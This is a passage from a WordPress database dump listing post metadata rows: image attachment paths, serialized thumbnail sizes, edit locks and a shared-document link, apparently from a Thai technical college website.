\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24981, 10105, '_wp_attached_file', '2020/04/25046302.jpg'),
(24982, 10105, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1118;s:6:\"height\";i:1464;s:4:\"file\";s:20:\"2020/04/25046302.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25046302-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25046302-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"25046302-768x1006.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1006;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25046302-782x1024.jpg\";s:5:\"width\";i:782;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25046302-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24983, 10106, '_wp_attached_file', '2020/04/25046303.jpg'),
(24984, 10106, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:20:\"2020/04/25046303.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25046303-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25046303-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"25046303-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25046303-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25046303-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24985, 10107, '_wp_attached_file', '2020/04/25046304.jpg'),
(24986, 10107, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1540;s:6:\"height\";i:1064;s:4:\"file\";s:20:\"2020/04/25046304.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25046304-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25046304-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"25046304-768x531.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25046304-1024x707.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25046304-400x276.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24987, 10108, '_wp_attached_file', '2020/04/25046301-1.jpg'),
(24988, 10108, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1074;s:6:\"height\";i:1524;s:4:\"file\";s:22:\"2020/04/25046301-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046301-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046301-1-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046301-1-768x1090.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046301-1-722x1024.jpg\";s:5:\"width\";i:722;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046301-1-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24989, 10109, '_wp_attached_file', '2020/04/25046302-1.jpg'),
(24990, 10109, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1118;s:6:\"height\";i:1464;s:4:\"file\";s:22:\"2020/04/25046302-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046302-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046302-1-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046302-1-768x1006.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1006;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046302-1-782x1024.jpg\";s:5:\"width\";i:782;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046302-1-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24991, 10110, '_wp_attached_file', '2020/04/25046303-1.jpg'),
(24992, 10110, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:22:\"2020/04/25046303-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046303-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046303-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046303-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046303-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046303-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24993, 10111, '_wp_attached_file', '2020/04/25046304-1.jpg'),
(24994, 10111, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1540;s:6:\"height\";i:1064;s:4:\"file\";s:22:\"2020/04/25046304-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046304-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046304-1-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"25046304-1-768x531.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046304-1-1024x707.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046304-1-400x276.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24995, 10112, '_wp_attached_file', '2020/04/25046301-2.jpg'),
(24996, 10112, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1074;s:6:\"height\";i:1524;s:4:\"file\";s:22:\"2020/04/25046301-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046301-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046301-2-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046301-2-768x1090.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046301-2-722x1024.jpg\";s:5:\"width\";i:722;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046301-2-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24997, 10113, '_wp_attached_file', '2020/04/25046302-2.jpg'),
(24998, 10113, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1118;s:6:\"height\";i:1464;s:4:\"file\";s:22:\"2020/04/25046302-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046302-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046302-2-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046302-2-768x1006.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1006;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046302-2-782x1024.jpg\";s:5:\"width\";i:782;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046302-2-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24999, 10114, '_wp_attached_file', '2020/04/25046303-2.jpg'),
(25000, 10114, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:22:\"2020/04/25046303-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046303-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046303-2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046303-2-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046303-2-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046303-2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25001, 10115, '_wp_attached_file', '2020/04/25046304-2.jpg'),
(25002, 10115, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1540;s:6:\"height\";i:1064;s:4:\"file\";s:22:\"2020/04/25046304-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046304-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046304-2-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"25046304-2-768x531.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046304-2-1024x707.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046304-2-400x276.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25003, 10116, '_wp_attached_file', '2020/04/25046301-3.jpg'),
(25004, 10116, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1074;s:6:\"height\";i:1524;s:4:\"file\";s:22:\"2020/04/25046301-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25046301-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25046301-3-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"25046301-3-768x1090.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"25046301-3-722x1024.jpg\";s:5:\"width\";i:722;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25046301-3-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25006, 10119, '_edit_lock', '1587956156:1'),
(25007, 10119, '_edit_last', '1'),
(25008, 10120, '_edit_lock', '1587953351:14'),
(25009, 10120, '_edit_last', '14'),
(25010, 10121, '_wp_attached_file', '2020/04/1ประกาศลงเบียน1-63.jpg'),
(25011, 10121, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:56:\"2020/04/1ประกาศลงเบียน1-63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"1ประกาศลงเบียน1-63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"1ประกาศลงเบียน1-63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"1ประกาศลงเบียน1-63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"1ประกาศลงเบียน1-63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"1ประกาศลงเบียน1-63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25012, 10122, '_wp_attached_file', '2020/04/2ประกาศลงทะเบียน1-63.jpg'),
(25013, 10122, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2020/04/2ประกาศลงทะเบียน1-63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"2ประกาศลงทะเบียน1-63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"2ประกาศลงทะเบียน1-63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"2ประกาศลงทะเบียน1-63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"2ประกาศลงทะเบียน1-63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"2ประกาศลงทะเบียน1-63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25016, 10120, '_hide_featured', NULL),
(25019, 10124, '_edit_lock', '1591072868:14'),
(25020, 10124, '_edit_last', '14'),
(25023, 10124, '_hide_featured', NULL),
(25024, 10119, '_cg_img_link', 'https://technicrayong-my.sharepoint.com/:x:/g/personal/prinya_c_rygtc_ac_th/EVOW2pYkGNxFgpWBYwZTnVoBvLRXcjqYRqZ_mAlbuH1CYA?e=PIdIkn'),
(25025, 10119, '_cg_link_target', ''),
(25026, 10119, '_oembed_fbf4c5f040ecf635ae5c165c177732a7', '{{unknown}}'),
(25029, 10119, '_hide_featured', NULL),
(25034, 10129, '_wp_attached_file', '2019/12/บัตรลงทะเบียน-01.jpg'),
(25035, 10129, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3240;s:6:\"height\";i:621;s:4:\"file\";s:54:\"2019/12/บัตรลงทะเบียน-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"บัตรลงทะเบียน-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"บัตรลงทะเบียน-01-300x58.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:58;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:54:\"บัตรลงทะเบียน-01-768x147.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:55:\"บัตรลงทะเบียน-01-1024x196.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:53:\"บัตรลงทะเบียน-01-400x77.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:77;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25036, 10131, '_edit_lock', '1588040388:14'),
(25037, 10131, '_edit_last', '14'),
(25038, 10132, '_wp_attached_file', '2020/04/20200427120307935.pdf'),
(25041, 10131, '_hide_featured', NULL),
(25042, 10136, '_edit_lock', '1588836909:14'),
(25043, 10136, '_edit_last', '14'),
(25044, 10137, '_wp_attached_file', '2020/05/94369506_1080649498977904_1028253202597806080_o.jpg'),
(25045, 10137, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1754;s:6:\"height\";i:1240;s:4:\"file\";s:59:\"2020/05/94369506_1080649498977904_1028253202597806080_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"94369506_1080649498977904_1028253202597806080_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"94369506_1080649498977904_1028253202597806080_o-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"94369506_1080649498977904_1028253202597806080_o-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"94369506_1080649498977904_1028253202597806080_o-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\